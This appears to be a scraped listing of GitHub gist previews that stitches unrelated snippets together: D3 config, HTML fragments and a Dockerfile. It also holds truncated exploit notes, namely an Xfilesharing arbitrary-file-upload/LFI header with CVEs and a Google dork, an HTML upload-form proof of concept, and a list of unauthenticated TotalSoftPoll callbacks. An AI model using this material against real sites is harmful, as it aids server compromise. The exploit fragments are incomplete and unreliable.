A tournament style bracket with flexbox and fallbacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
license: gpl-3.0 | |
height: 960 | |
redirect: https://observablehq.com/@d3/d3-zoomable-circle-packing |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##################### | |
Arbitrary File Upload | |
##################### | |
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> | |
<input type="text" name="sid" value="joe"> | |
<input type="file" name="file"> | |
<input type="submit" value="Upload" name="submit"> | |
</form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##################### | |
Arbitrary File Upload | |
##################### | |
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> | |
<input type="text" name="sid" value="joe"> | |
<input type="file" name="file"> | |
<input type="submit" value="Upload" name="submit"> | |
</form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion | |
# Google Dork: inurl:/?op=registration | |
# Date: 14th Nov, 2019 | |
# Exploit Author: Noman Riffat | |
# Vendor Homepage: https://sibsoft.net/xfilesharing.html | |
# Version: <=2.5.1 | |
# CVE : CVE-2019-18951, CVE-2019-18952 | |
##################### | |
Arbitrary File Upload |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
An attacker can call following functions as an unauthenticated user. | |
TotalSoftPoll_Clone_Callback | |
TotalSoftPoll_Del_Callback | |
TotalSoftPoll_Edit_Callback | |
TotalSoftPoll_Edit_Q_M_Callback | |
TotalSoftPoll_Edit_Ans_Callback | |
TotalSoftPoll_Theme_Clone_Callback | |
TotalSoftPoll_Theme_Edit_Callback | |
TotalSoftPoll_Theme_Edit1_Callback |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
license: gpl-3.0 | |
height: 960 | |
border: no | |
redirect: https://beta.observablehq.com/@mbostock/d3-circle-packing |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
<span id="matchCallback"></span> | |
<div id="matches"> | |
<div class="demo"> | |
</div> | |
</div> | |
--> | |
<div id="matchesblank"> | |
<div class="demo"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM alpine | |
RUN apk add --update --no-cache nodejs | |
RUN npm i -g yarn | |
ADD package.json yarn.lock /tmp/ | |
ADD .yarn-cache.tgz / | |
RUN cd /tmp && yarn | |
RUN mkdir -p /service && cd /service && ln -s /tmp/node_modules |